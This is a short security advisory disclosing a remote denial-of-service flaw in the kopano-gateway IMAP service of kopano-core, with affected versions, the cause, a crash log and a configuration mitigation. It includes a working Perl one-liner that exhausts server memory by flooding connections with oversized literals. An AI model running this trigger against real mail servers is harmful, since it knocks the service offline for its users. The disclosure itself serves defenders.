kopano-core 11.0.1.143: Remote DoS with resource exhaustion

[Jan Engelhardt <jengelh () inai de>]

To the best of my knowledge, this is the initial publication,
and there is no CVE number as of this time.


# Affected versions

  * kopano-core 8.5 to 11.0.1.143

The "kopano-gateway" program implements a network service for IMAP.
By default, a generous buffer is allocated for string literals, so
the service can be triggered to go into an out-of-memory condition.
OOM appears to be handled (log msg with "Cannot allocate memory"),
but not _consistently_, letting std::bad_alloc escape somewhere,
terminating the process and denying further access to the service.


# Trigger

» ./kopano-gateway -F &
» perl -MIO::Socket::INET -e 
  '$a="A"x65536;for(1..99){$s=IO::Socket::INET->new(PeerHost,"localhost",PeerPort,143);
  $s->write("K {134217727}\r\n");$s->write($a) for 1..2048;push@k,$s;}'

2021-05-01T17:00:03.424598: [error  ] Failed to read line: Cannot allocate memory
2021-05-01T17:00:40.489165: [crit   ] ----------------------------------------------------------------------
2021-05-01T17:00:40.489174: [crit   ] Fatal error detected. Please report all following information.
2021-05-01T17:00:40.489186: [crit   ] kopano-dagent 11.0.1
2021-05-01T17:00:40.489210: [crit   ] OS: openSUSE Tumbleweed (Linux 5.12.0-3.g6208a83-default x86_64)
2021-05-01T17:00:40.489217: [crit   ] Thread name: kopano-gateway
2021-05-01T17:00:40.489429: [crit   ] Peak RSS: 3056660
2021-05-01T17:00:40.489444: [crit   ] Pid 31604 caught SIGABRT (6), out of memory or unhandled exception, traceback:
terminate called after throwing an instance of 'std::bad_alloc'
  what():  std::bad_alloc


# Mitigation

A reduction of the buffer (gateway.cfg:imap_max_messagesize) is 
possible, but this administrative action equally implies a reduction of 
the service capabilities offered to end-users (and may be unpopular).